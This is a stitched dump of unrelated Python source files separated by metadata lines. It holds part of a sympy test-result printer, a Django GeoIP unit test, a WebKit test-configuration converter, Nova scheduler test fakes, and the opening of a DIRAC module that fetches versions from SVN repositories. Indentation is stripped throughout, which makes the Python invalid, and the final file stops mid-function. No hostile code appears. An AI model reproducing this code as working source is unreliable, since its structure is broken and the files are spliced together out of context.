# the stdout is not a terminal, this for example happens if the
# output is piped to less, e.g. "bin/test | less". In this case,
# the terminal control sequences would be printed verbatim, so
# don't use any colors.
color = ""
if sys.platform == "win32":
# Windows consoles don't support ANSI escape sequences
color = ""
if self._line_wrap:
if text[0] != "\n":
sys.stdout.write("\n")
if color == "":
sys.stdout.write(text)
else:
sys.stdout.write("%s%s%s" % (c_color % colors[color], text, c_normal))
sys.stdout.flush()
l = text.rfind("\n")
if l == -1:
self._write_pos += len(text)
else:
self._write_pos = len(text)-l-1
self._line_wrap = self._write_pos >= width
self._write_pos %= width
def write_center(self, text, delim="="):
width = 80
if text != "":
text = " %s " % text
idx = (width-len(text)) // 2
t = delim*idx + text + delim*(width-idx-len(text))
self.write(t+"\n")
def write_exception(self, e, val, tb):
t = traceback.extract_tb(tb)
# remove the first item, as that is always runtests.py
t = t[1:]
t = traceback.format_list(t)
self.write("".join(t))
t = traceback.format_exception_only(e, val)
self.write("".join(t))
def start(self, seed=None):
self.write_center("test process starts")
executable = sys.executable
v = tuple(sys.version_info)
python_version = "%s.%s.%s-%s-%s" % v
self.write("executable: %s (%s)\n" % (executable, python_version))
from .misc import ARCH
self.write("architecture: %s\n" % ARCH)
from sympy.polys.domains import GROUND_TYPES
self.write("ground types: %s\n" % GROUND_TYPES)
if seed is not None:
self.write("random seed: %d\n\n" % seed)
self._t_start = clock()
def finish(self):
self._t_end = clock()
self.write("\n")
global text, linelen
text = "tests finished: %d passed, " % self._passed
linelen = len(text)
def add_text(mytext):
global text, linelen
"""Break new text if too long."""
if linelen + len(mytext) > 80:
text += '\n'
linelen = 0
text += mytext
linelen += len(mytext)
if len(self._failed) > 0:
add_text("%d failed, " % len(self._failed))
if len(self._failed_doctest) > 0:
add_text("%d failed, " % len(self._failed_doctest))
if self._skipped > 0:
add_text("%d skipped, " % self._skipped)
if self._xfailed > 0:
add_text("%d expected to fail, " % self._xfailed)
if len(self._xpassed) > 0:
add_text("%d expected to fail but passed, " % len(self._xpassed))
if len(self._exceptions) > 0:
add_text("%d exceptions, " % len(self._exceptions))
add_text("in %.2f seconds" % (self._t_end - self._t_start))
if len(self._xpassed) > 0:
self.write_center("xpassed tests", "_")
for e in self._xpassed:
self.write("%s:%s\n" % (e[0], e[1]))
self.write("\n")
if self._tb_style != "no" and len(self._exceptions) > 0:
#self.write_center("These tests raised an exception", "_")
for e in self._exceptions:
filename, f, (t, val, tb) = e
self.write_center("", "_")
if f is None:
s = "%s" % filename
else:
s = "%s:%s" % (filename, f.__name__)
self.write_center(s, "_")
self.write_exception(t, val, tb)
self.write("\n")
if self._tb_style != "no" and len(self._failed) > 0:
#self.write_center("Failed", "_")
for e in self._failed:
filename, f, (t, val, tb) = e
self.write_center("", "_")
self.write_center("%s:%s" % (filename, f.__name__), "_")
self.write_exception(t, val, tb)
self.write("\n")
if self._tb_style != "no" and len(self._failed_doctest) > 0:
#self.write_center("Failed", "_")
for e in self._failed_doctest:
filename, msg = e
self.write_center("", "_")
self.write_center("%s" % filename, "_")
self.write(msg)
self.write("\n")
self.write_center(text)
ok = len(self._failed) == 0 and len(self._exceptions) == 0 and \
len(self._failed_doctest) == 0
if not ok:
self.write("DO *NOT* COMMIT!\n")
return ok
def entering_filename(self, filename, n):
rel_name = filename[len(self._root_dir)+1:]
self._active_file = rel_name
self._active_file_error = False
self.write(rel_name)
self.write("[%d] " % n)
def leaving_filename(self):
if self._colors:
self.write(" ")
if self._active_file_error:
self.write("[FAIL]", "Red", align="right")
else:
self.write("[OK]", "Green", align="right")
self.write("\n")
if self._verbose:
self.write("\n")
def entering_test(self, f):
self._active_f = f
if self._verbose:
self.write("\n"+f.__name__+" ")
def test_xfail(self):
self._xfailed += 1
self.write("f", "Green")
def test_xpass(self, fname):
self._xpassed.append((self._active_file, fname))
self.write("X", "Green")
def test_fail(self, exc_info):
self._failed.append((self._active_file, self._active_f, exc_info))
self.write("F", "Red")
self._active_file_error = True
def doctest_fail(self, name, error_msg):
# the first line contains "******", remove it:
error_msg = "\n".join(error_msg.split("\n")[1:])
self._failed_doctest.append((name, error_msg))
self.write("F", "Red")
self._active_file_error = True
def test_pass(self):
self._passed += 1
if self._verbose:
self.write("ok", "Green")
else:
self.write(".", "Green")
def test_skip(self, v):
self._skipped += 1
self.write("s", "Green")
if self._verbose:
self.write(" - ", "Green")
self.write(v.message, "Green")
def test_exception(self, exc_info):
self._exceptions.append((self._active_file, self._active_f, exc_info))
self.write("E", "Red")
self._active_file_error = True
def import_error(self, filename, exc_info):
self._exceptions.append((filename, None, exc_info))
rel_name = filename[len(self._root_dir)+1:]
self.write(rel_name)
self.write("[?] Failed to import", "Red")
if self._colors:
self.write(" ")
self.write("[FAIL]", "Red", align="right")
self.write("\n")
sympy_dir = get_sympy_dir()
| agpl-3.0 | 7,366,864,913,316,608,000 | 36.926048 | 95 | 0.562332 | false |
tjsavage/sfcsdatabase | django/contrib/gis/tests/test_geoip.py | 290 | 4204 | import os, unittest
from django.db import settings
from django.contrib.gis.geos import GEOSGeometry
from django.contrib.gis.utils import GeoIP, GeoIPException
# Note: Requires use of both the GeoIP country and city datasets.
# The GEOIP_DATA path should be the only setting set (the directory
# should contain links or the actual database files 'GeoIP.dat' and
# 'GeoLiteCity.dat'.
class GeoIPTest(unittest.TestCase):
def test01_init(self):
"Testing GeoIP initialization."
g1 = GeoIP() # Everything inferred from GeoIP path
path = settings.GEOIP_PATH
g2 = GeoIP(path, 0) # Passing in data path explicitly.
g3 = GeoIP.open(path, 0) # MaxMind Python API syntax.
for g in (g1, g2, g3):
self.assertEqual(True, bool(g._country))
self.assertEqual(True, bool(g._city))
# Only passing in the location of one database.
city = os.path.join(path, 'GeoLiteCity.dat')
cntry = os.path.join(path, 'GeoIP.dat')
g4 = GeoIP(city, country='')
self.assertEqual(None, g4._country)
g5 = GeoIP(cntry, city='')
self.assertEqual(None, g5._city)
# Improper parameters.
bad_params = (23, 'foo', 15.23)
for bad in bad_params:
self.assertRaises(GeoIPException, GeoIP, cache=bad)
if isinstance(bad, basestring):
e = GeoIPException
else:
e = TypeError
self.assertRaises(e, GeoIP, bad, 0)
def test02_bad_query(self):
"Testing GeoIP query parameter checking."
cntry_g = GeoIP(city='<foo>')
# No city database available, these calls should fail.
self.assertRaises(GeoIPException, cntry_g.city, 'google.com')
self.assertRaises(GeoIPException, cntry_g.coords, 'yahoo.com')
# Non-string query should raise TypeError
self.assertRaises(TypeError, cntry_g.country_code, 17)
self.assertRaises(TypeError, cntry_g.country_name, GeoIP)
def test03_country(self):
"Testing GeoIP country querying methods."
g = GeoIP(city='<foo>')
fqdn = 'www.google.com'
addr = '12.215.42.19'
for query in (fqdn, addr):
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
def test04_city(self):
"Testing GeoIP city querying methods."
g = GeoIP(country='<foo>')
addr = '130.80.29.3'
fqdn = 'chron.com'
for query in (fqdn, addr):
# Country queries should still work.
for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
self.assertEqual('US', func(query))
for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
self.assertEqual('United States', func(query))
self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
g.country(query))
# City information dictionary.
d = g.city(query)
self.assertEqual('USA', d['country_code3'])
self.assertEqual('Houston', d['city'])
self.assertEqual('TX', d['region'])
self.assertEqual(713, d['area_code'])
geom = g.geos(query)
self.failIf(not isinstance(geom, GEOSGeometry))
lon, lat = (-95.3670, 29.7523)
lat_lon = g.lat_lon(query)
lat_lon = (lat_lon[1], lat_lon[0])
for tup in (geom.tuple, g.coords(query), g.lon_lat(query), lat_lon):
self.assertAlmostEqual(lon, tup[0], 4)
self.assertAlmostEqual(lat, tup[1], 4)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GeoIPTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| bsd-3-clause | 8,780,992,160,874,227,000 | 39.815534 | 89 | 0.595385 | false |
dparshin/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/models/test_configuration.py | 126 | 13672 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class TestConfiguration(object):
def __init__(self, version, architecture, build_type):
self.version = version
self.architecture = architecture
self.build_type = build_type
@classmethod
def category_order(cls):
"""The most common human-readable order in which the configuration properties are listed."""
return ['version', 'architecture', 'build_type']
def items(self):
return self.__dict__.items()
def keys(self):
return self.__dict__.keys()
def __str__(self):
return ("<%(version)s, %(architecture)s, %(build_type)s>" %
self.__dict__)
def __repr__(self):
return "TestConfig(version='%(version)s', architecture='%(architecture)s', build_type='%(build_type)s')" % self.__dict__
def __hash__(self):
return hash(self.version + self.architecture + self.build_type)
def __eq__(self, other):
return self.__hash__() == other.__hash__()
def values(self):
"""Returns the configuration values of this instance as a tuple."""
return self.__dict__.values()
class SpecifierSorter(object):
def __init__(self, all_test_configurations=None, macros=None):
self._specifier_to_category = {}
if not all_test_configurations:
return
for test_configuration in all_test_configurations:
for category, specifier in test_configuration.items():
self.add_specifier(category, specifier)
self.add_macros(macros)
def add_specifier(self, category, specifier):
self._specifier_to_category[specifier] = category
def add_macros(self, macros):
if not macros:
return
# Assume well-formed macros.
for macro, specifier_list in macros.items():
self.add_specifier(self.category_for_specifier(specifier_list[0]), macro)
@classmethod
def category_priority(cls, category):
return TestConfiguration.category_order().index(category)
def specifier_priority(self, specifier):
return self.category_priority(self._specifier_to_category[specifier])
def category_for_specifier(self, specifier):
return self._specifier_to_category.get(specifier)
def sort_specifiers(self, specifiers):
category_slots = map(lambda x: [], TestConfiguration.category_order())
for specifier in specifiers:
category_slots[self.specifier_priority(specifier)].append(specifier)
def sort_and_return(result, specifier_list):
specifier_list.sort()
return result + specifier_list
return reduce(sort_and_return, category_slots, [])
class TestConfigurationConverter(object):
def __init__(self, all_test_configurations, configuration_macros=None):
self._all_test_configurations = all_test_configurations
self._configuration_macros = configuration_macros or {}
self._specifier_to_configuration_set = {}
self._specifier_sorter = SpecifierSorter()
self._collapsing_sets_by_size = {}
self._junk_specifier_combinations = {}
self._collapsing_sets_by_category = {}
matching_sets_by_category = {}
for configuration in all_test_configurations:
for category, specifier in configuration.items():
self._specifier_to_configuration_set.setdefault(specifier, set()).add(configuration)
self._specifier_sorter.add_specifier(category, specifier)
self._collapsing_sets_by_category.setdefault(category, set()).add(specifier)
# FIXME: This seems extra-awful.
for cat2, spec2 in configuration.items():
if category == cat2:
continue
matching_sets_by_category.setdefault(specifier, {}).setdefault(cat2, set()).add(spec2)
for collapsing_set in self._collapsing_sets_by_category.values():
self._collapsing_sets_by_size.setdefault(len(collapsing_set), set()).add(frozenset(collapsing_set))
for specifier, sets_by_category in matching_sets_by_category.items():
for category, set_by_category in sets_by_category.items():
if len(set_by_category) == 1 and self._specifier_sorter.category_priority(category) > self._specifier_sorter.specifier_priority(specifier):
self._junk_specifier_combinations[specifier] = set_by_category
self._specifier_sorter.add_macros(configuration_macros)
def specifier_sorter(self):
return self._specifier_sorter
def _expand_macros(self, specifier):
expanded_specifiers = self._configuration_macros.get(specifier)
return expanded_specifiers or [specifier]
def to_config_set(self, specifier_set, error_list=None):
"""Convert a list of specifiers into a set of TestConfiguration instances."""
if len(specifier_set) == 0:
return self._all_test_configurations
matching_sets = {}
for specifier in specifier_set:
for expanded_specifier in self._expand_macros(specifier):
configurations = self._specifier_to_configuration_set.get(expanded_specifier)
if not configurations:
if error_list is not None:
error_list.append("Unrecognized modifier '" + expanded_specifier + "'")
return set()
category = self._specifier_sorter.category_for_specifier(expanded_specifier)
matching_sets.setdefault(category, set()).update(configurations)
return reduce(set.intersection, matching_sets.values())
@classmethod
def collapse_macros(cls, macros_dict, specifiers_list):
for macro_specifier, macro in macros_dict.items():
if len(macro) == 1:
continue
for combination in cls.combinations(specifiers_list, len(macro)):
if cls.symmetric_difference(combination) == set(macro):
for item in combination:
specifiers_list.remove(item)
new_specifier_set = cls.intersect_combination(combination)
new_specifier_set.add(macro_specifier)
specifiers_list.append(frozenset(new_specifier_set))
def collapse_individual_specifier_set(macro_specifier, macro):
specifiers_to_remove = []
specifiers_to_add = []
for specifier_set in specifiers_list:
macro_set = set(macro)
if macro_set.intersection(specifier_set) == macro_set:
specifiers_to_remove.append(specifier_set)
specifiers_to_add.append(frozenset((set(specifier_set) - macro_set) | set([macro_specifier])))
for specifier in specifiers_to_remove:
specifiers_list.remove(specifier)
for specifier in specifiers_to_add:
specifiers_list.append(specifier)
for macro_specifier, macro in macros_dict.items():
collapse_individual_specifier_set(macro_specifier, macro)
# FIXME: itertools.combinations in buggy in Python 2.6.1 (the version that ships on SL).
# It seems to be okay in 2.6.5 or later; until then, this is the implementation given
# in http://docs.python.org/library/itertools.html (from 2.7).
@staticmethod
def combinations(iterable, r):
# combinations('ABCD', 2) --> AB AC AD BC BD CD
# combinations(range(4), 3) --> 012 013 023 123
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = range(r)
yield tuple(pool[i] for i in indices)
while True:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1 # pylint: disable=W0631
for j in range(i + 1, r): # pylint: disable=W0631
indices[j] = indices[j - 1] + 1
yield tuple(pool[i] for i in indices)
@classmethod
def intersect_combination(cls, combination):
return reduce(set.intersection, [set(specifiers) for specifiers in combination])
@classmethod
def symmetric_difference(cls, iterable):
union = set()
intersection = iterable[0]
for item in iterable:
union = union | item
intersection = intersection.intersection(item)
return union - intersection
def to_specifiers_list(self, test_configuration_set):
"""Convert a set of TestConfiguration instances into one or more list of specifiers."""
# Easy out: if the set is all configurations, the modifier is empty.
if len(test_configuration_set) == len(self._all_test_configurations):
return [[]]
# 1) Build a list of specifier sets, discarding specifiers that don't add value.
specifiers_list = []
for config in test_configuration_set:
values = set(config.values())
for specifier, junk_specifier_set in self._junk_specifier_combinations.items():
if specifier in values:
values -= junk_specifier_set
specifiers_list.append(frozenset(values))
def try_collapsing(size, collapsing_sets):
if len(specifiers_list) < size:
return False
for combination in self.combinations(specifiers_list, size):
if self.symmetric_difference(combination) in collapsing_sets:
for item in combination:
specifiers_list.remove(item)
specifiers_list.append(frozenset(self.intersect_combination(combination)))
return True
return False
# 2) Collapse specifier sets with common specifiers:
# (xp, release), (xp, debug) --> (xp, x86)
for size, collapsing_sets in self._collapsing_sets_by_size.items():
while try_collapsing(size, collapsing_sets):
pass
def try_abbreviating(collapsing_sets):
if len(specifiers_list) < 2:
return False
for combination in self.combinations(specifiers_list, 2):
for collapsing_set in collapsing_sets:
diff = self.symmetric_difference(combination)
if diff <= collapsing_set:
common = self.intersect_combination(combination)
for item in combination:
specifiers_list.remove(item)
specifiers_list.append(frozenset(common | diff))
return True
return False
# 3) Abbreviate specifier sets by combining specifiers across categories.
# (xp, release), (win7, release) --> (xp, win7, release)
while try_abbreviating(self._collapsing_sets_by_size.values()):
pass
# 4) Substitute specifier subsets that match macros witin each set:
# (xp, vista, win7, release) -> (win, release)
self.collapse_macros(self._configuration_macros, specifiers_list)
macro_keys = set(self._configuration_macros.keys())
# 5) Collapsing macros may have created combinations the can now be abbreviated.
# (xp, release), (linux, x86, release), (linux, x86_64, release) --> (xp, release), (linux, release) --> (xp, linux, release)
while try_abbreviating([self._collapsing_sets_by_category['version'] | macro_keys]):
pass
# 6) Remove cases where we have collapsed but have all macros.
# (android, win, mac, linux, release) --> (release)
specifiers_to_remove = []
for specifier_set in specifiers_list:
if macro_keys <= specifier_set:
specifiers_to_remove.append(specifier_set)
for specifier_set in specifiers_to_remove:
specifiers_list.remove(specifier_set)
specifiers_list.append(frozenset(specifier_set - macro_keys))
return specifiers_list
| bsd-3-clause | -7,883,026,823,321,178,000 | 43.679739 | 155 | 0.629608 | false |
saleemjaveds/https-github.com-openstack-nova | nova/tests/scheduler/fakes.py | 19 | 11486 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fakes For Scheduler tests.
"""
import mox
from nova.compute import vm_states
from nova import db
from nova.openstack.common import jsonutils
from nova.scheduler import filter_scheduler
from nova.scheduler import host_manager
COMPUTE_NODES = [
dict(id=1, local_gb=1024, memory_mb=1024, vcpus=1,
disk_available_least=None, free_ram_mb=512, vcpus_used=1,
free_disk_gb=512, local_gb_used=0, updated_at=None,
service=dict(host='host1', disabled=False),
hypervisor_hostname='node1', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=2, local_gb=2048, memory_mb=2048, vcpus=2,
disk_available_least=1024, free_ram_mb=1024, vcpus_used=2,
free_disk_gb=1024, local_gb_used=0, updated_at=None,
service=dict(host='host2', disabled=True),
hypervisor_hostname='node2', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=3, local_gb=4096, memory_mb=4096, vcpus=4,
disk_available_least=3333, free_ram_mb=3072, vcpus_used=1,
free_disk_gb=3072, local_gb_used=0, updated_at=None,
service=dict(host='host3', disabled=False),
hypervisor_hostname='node3', host_ip='127.0.0.1',
hypervisor_version=0),
dict(id=4, local_gb=8192, memory_mb=8192, vcpus=8,
disk_available_least=8192, free_ram_mb=8192, vcpus_used=0,
free_disk_gb=8888, local_gb_used=0, updated_at=None,
service=dict(host='host4', disabled=False),
hypervisor_hostname='node4', host_ip='127.0.0.1',
hypervisor_version=0),
# Broken entry
dict(id=5, local_gb=1024, memory_mb=1024, vcpus=1, service=None),
]
COMPUTE_NODES_METRICS = [
dict(id=1, local_gb=1024, memory_mb=1024, vcpus=1,
disk_available_least=512, free_ram_mb=512, vcpus_used=1,
free_disk_gb=512, local_gb_used=0, updated_at=None,
service=dict(host='host1', disabled=False),
hypervisor_hostname='node1', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 512,
'timestamp': None,
'source': 'host1'
},
{'name': 'bar',
'value': 1.0,
'timestamp': None,
'source': 'host1'
},
])),
dict(id=2, local_gb=2048, memory_mb=2048, vcpus=2,
disk_available_least=1024, free_ram_mb=1024, vcpus_used=2,
free_disk_gb=1024, local_gb_used=0, updated_at=None,
service=dict(host='host2', disabled=True),
hypervisor_hostname='node2', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 1024,
'timestamp': None,
'source': 'host2'
},
{'name': 'bar',
'value': 2.0,
'timestamp': None,
'source': 'host2'
},
])),
dict(id=3, local_gb=4096, memory_mb=4096, vcpus=4,
disk_available_least=3072, free_ram_mb=3072, vcpus_used=1,
free_disk_gb=3072, local_gb_used=0, updated_at=None,
service=dict(host='host3', disabled=False),
hypervisor_hostname='node3', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 3072,
'timestamp': None,
'source': 'host3'
},
{'name': 'bar',
'value': 1.0,
'timestamp': None,
'source': 'host3'
},
])),
dict(id=4, local_gb=8192, memory_mb=8192, vcpus=8,
disk_available_least=8192, free_ram_mb=8192, vcpus_used=0,
free_disk_gb=8192, local_gb_used=0, updated_at=None,
service=dict(host='host4', disabled=False),
hypervisor_hostname='node4', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 8192,
'timestamp': None,
'source': 'host4'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host4'
},
])),
dict(id=5, local_gb=768, memory_mb=768, vcpus=8,
disk_available_least=768, free_ram_mb=768, vcpus_used=0,
free_disk_gb=768, local_gb_used=0, updated_at=None,
service=dict(host='host5', disabled=False),
hypervisor_hostname='node5', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 768,
'timestamp': None,
'source': 'host5'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host5'
},
{'name': 'zot',
'value': 1,
'timestamp': None,
'source': 'host5'
},
])),
dict(id=6, local_gb=2048, memory_mb=2048, vcpus=8,
disk_available_least=2048, free_ram_mb=2048, vcpus_used=0,
free_disk_gb=2048, local_gb_used=0, updated_at=None,
service=dict(host='host6', disabled=False),
hypervisor_hostname='node6', host_ip='127.0.0.1',
hypervisor_version=0,
metrics=jsonutils.dumps([{'name': 'foo',
'value': 2048,
'timestamp': None,
'source': 'host6'
},
{'name': 'bar',
'value': 0,
'timestamp': None,
'source': 'host6'
},
{'name': 'zot',
'value': 2,
'timestamp': None,
'source': 'host6'
},
])),
]
INSTANCES = [
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host1', node='node1'),
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host2', node='node2'),
dict(root_gb=512, ephemeral_gb=0, memory_mb=512, vcpus=1,
host='host2', node='node2'),
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host='host3', node='node3'),
# Broken host
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host=None),
# No matching host
dict(root_gb=1024, ephemeral_gb=0, memory_mb=1024, vcpus=1,
host='host5', node='node5'),
]
class FakeFilterScheduler(filter_scheduler.FilterScheduler):
def __init__(self, *args, **kwargs):
super(FakeFilterScheduler, self).__init__(*args, **kwargs)
self.host_manager = host_manager.HostManager()
class FakeHostManager(host_manager.HostManager):
"""host1: free_ram_mb=1024-512-512=0, free_disk_gb=1024-512-512=0
host2: free_ram_mb=2048-512=1536 free_disk_gb=2048-512=1536
host3: free_ram_mb=4096-1024=3072 free_disk_gb=4096-1024=3072
host4: free_ram_mb=8192 free_disk_gb=8192
"""
def __init__(self):
super(FakeHostManager, self).__init__()
self.service_states = {
'host1': {
'compute': {'host_memory_free': 1073741824},
},
'host2': {
'compute': {'host_memory_free': 2147483648},
},
'host3': {
'compute': {'host_memory_free': 3221225472},
},
'host4': {
'compute': {'host_memory_free': 999999999},
},
}
class FakeHostState(host_manager.HostState):
def __init__(self, host, node, attribute_dict):
super(FakeHostState, self).__init__(host, node)
for (key, val) in attribute_dict.iteritems():
setattr(self, key, val)
class FakeInstance(object):
def __init__(self, context=None, params=None):
"""Create a test instance. Returns uuid."""
self.context = context
i = self._create_fake_instance(params=params)
self.uuid = i['uuid']
def _create_fake_instance(self, params=None):
"""Create a test instance."""
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = 1
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = 'fake'
inst['project_id'] = 'fake'
inst['instance_type_id'] = 2
inst['ami_launch_index'] = 0
inst.update(params)
return db.instance_create(self.context, inst)
class FakeComputeAPI(object):
def create_db_entry_for_new_instance(self, *args, **kwargs):
pass
def mox_host_manager_db_calls(mock, context):
mock.StubOutWithMock(db, 'compute_node_get_all')
db.compute_node_get_all(mox.IgnoreArg()).AndReturn(COMPUTE_NODES)
| apache-2.0 | 3,606,294,047,448,555,500 | 42.839695 | 78 | 0.450113 | false |
rajanandakumar/DIRAC | Core/Utilities/Distribution.py | 3 | 16784 | # $HeadURL$
__RCSID__ = "$Id$"
import urllib2, re, tarfile, os, types, sys, subprocess, urlparse, tempfile
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities import CFG, File, List
class Distribution:
cernAnonRoot = 'http://svn.cern.ch/guest/dirac'
googleAnonRoot = 'http://dirac-grid.googlecode.com/svn'
cernDevRoot = 'svn+ssh://svn.cern.ch/reps/dirac'
googleDevRoot = 'https://dirac-grid.googlecode.com/svn'
anonymousSVNRoot = { 'global' : cernAnonRoot,
'DIRAC' : cernAnonRoot,
'LHCbDIRAC' : cernAnonRoot,
'LHCbVMDIRAC' : cernAnonRoot,
'LHCbWebDIRAC' : cernAnonRoot,
'BelleDIRAC' : googleAnonRoot,
'MagicDIRAC' : googleAnonRoot,
'CTADIRAC' : googleAnonRoot,
'EELADIRAC' : googleAnonRoot,
'ILCDIRAC' : cernAnonRoot,
'Docs' : googleAnonRoot,
}
devSVNRoot = { 'global' : cernDevRoot,
'DIRAC' : cernDevRoot,
'LHCbDIRAC' : cernDevRoot,
'LHCbVMDIRAC' : cernDevRoot,
'LHCbWebDIRAC' : cernDevRoot,
'ILCDIRAC' : cernDevRoot,
'BelleDIRAC' : googleDevRoot,
'MagicDIRAC' : googleDevRoot,
'CTADIRAC' : googleDevRoot,
'EELADIRAC' : googleDevRoot,
'Docs' : googleDevRoot,
}
def __init__( self, package = False ):
if not package:
package = 'global'
if package not in Distribution.anonymousSVNRoot:
raise Exception( "Package %s does not have a registered svn root" % package )
self.package = package
self.svnRoot = Distribution.anonymousSVNRoot[ package ]
self.svnPass = False
self.svnUser = False
self.cmdQueue = []
def getSVNPathForPackage( self, package, path ):
if package not in self.anonymousSVNRoot:
return "%s/%s" % ( Distribution.cernAnonRoot, path )
return "%s/%s" % ( self.anonymousSVNRoot[ package ], path )
def getPackageName( self ):
return self.package
def getDevPath( self, path = False ):
devPath = Distribution.devSVNRoot[ self.package ]
if path:
devPath += "/%s" % path
return devPath
def setSVNPassword( self, password ):
self.svnPass = password
def setSVNUser( self, user ):
self.svnUser = user
def addCommandToQueue( self, cmd ):
self.cmdQueue.append( cmd )
def executeCommandQueue( self ):
while self.cmdQueue:
if not self.executeCommand( self.cmdQueue.pop( 0 ), getOutput = False ):
return False
return True
def emptyQueue( self ):
return len( self.cmdQueue ) == 0
def getRepositoryVersions( self ):
if self.package == 'global' :
webLocation = "%s/tags" % self.svnRoot
else:
webLocation = '%s/%s/tags/%s' % ( self.svnRoot, self.package, self.package )
try:
remoteFile = urllib2.urlopen( webLocation )
except urllib2.URLError:
gLogger.exception()
sys.exit( 2 )
remoteData = remoteFile.read()
remoteFile.close()
if not remoteData:
gLogger.error( "Could not retrieve versions for package %s" % self.package )
sys.exit( 1 )
versions = []
rePackage = ".*"
versionRE = re.compile( "<li> *<a *href=.*> *(%s)/ *</a> *</li>" % rePackage )
for line in remoteData.split( "\n" ):
res = versionRE.search( line )
if res:
versions.append( res.groups()[0] )
return versions
def getSVNFileContents( self, svnPath ):
gLogger.info( "Reading %s from %s" % ( svnPath, self.svnRoot) )
remoteLocation = "%s/%s" % ( self.svnRoot, svnPath )
try:
remoteFile = urllib2.urlopen( remoteLocation )
remoteData = remoteFile.read()
remoteFile.close()
if remoteData:
return remoteData
except Exception:
pass
#Web cat failed. Try directly with svn
exitStatus, remoteData = self.executeCommand( "svn cat '%s" % remoteLocation )
if exitStatus:
print "Error: Could not retrieve %s from the web nor via SVN. Aborting..." % svnPath
sys.exit( 1 )
return remoteData
def loadCFGFromRepository( self, svnPath ):
remoteData = self.getSVNFileContents( svnPath )
return CFG.CFG().loadFromBuffer( remoteData )
def getVersionsCFG( self ):
return self.loadCFGFromRepository( '%s/trunk/%s/versions.cfg' % ( self.package, self.package ) )
def executeCommand( self, cmd, getOutput = True ):
env = dict( os.environ )
if self.svnPass:
env[ 'SVN_PASSWORD' ] = self.svnPass
if not getOutput:
return subprocess.Popen( cmd, shell = True, env = env ).wait() == 0
#Get output
proc = subprocess.Popen( cmd,
shell = True, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, close_fds = True, env = env )
stdData = proc.stdout.read()
proc.wait()
return ( proc.returncode, stdData )
def __getDevCmdBase( self, path ):
devRoot = self.getDevPath( path )
isHTTPS = False
urlRes = urlparse.urlparse( devRoot )
# Parse a URL into 6 components:
# <scheme>://<netloc>/<path>;<params>?<query>#<fragment>
# (scheme, netloc, path, params, query, fragment)
args = []
if urlRes[0] == "https":
isHTTPS = True
if self.svnUser:
if isHTTPS:
args.append( "--username '%s'" % self.svnUser )
else:
urlRes = list( urlparse.urlparse( devRoot ) )
urlRes[1] = "%s@%s" % ( self.svnUser, urlRes[1] )
devRoot = urlparse.urlunparse( urlRes )
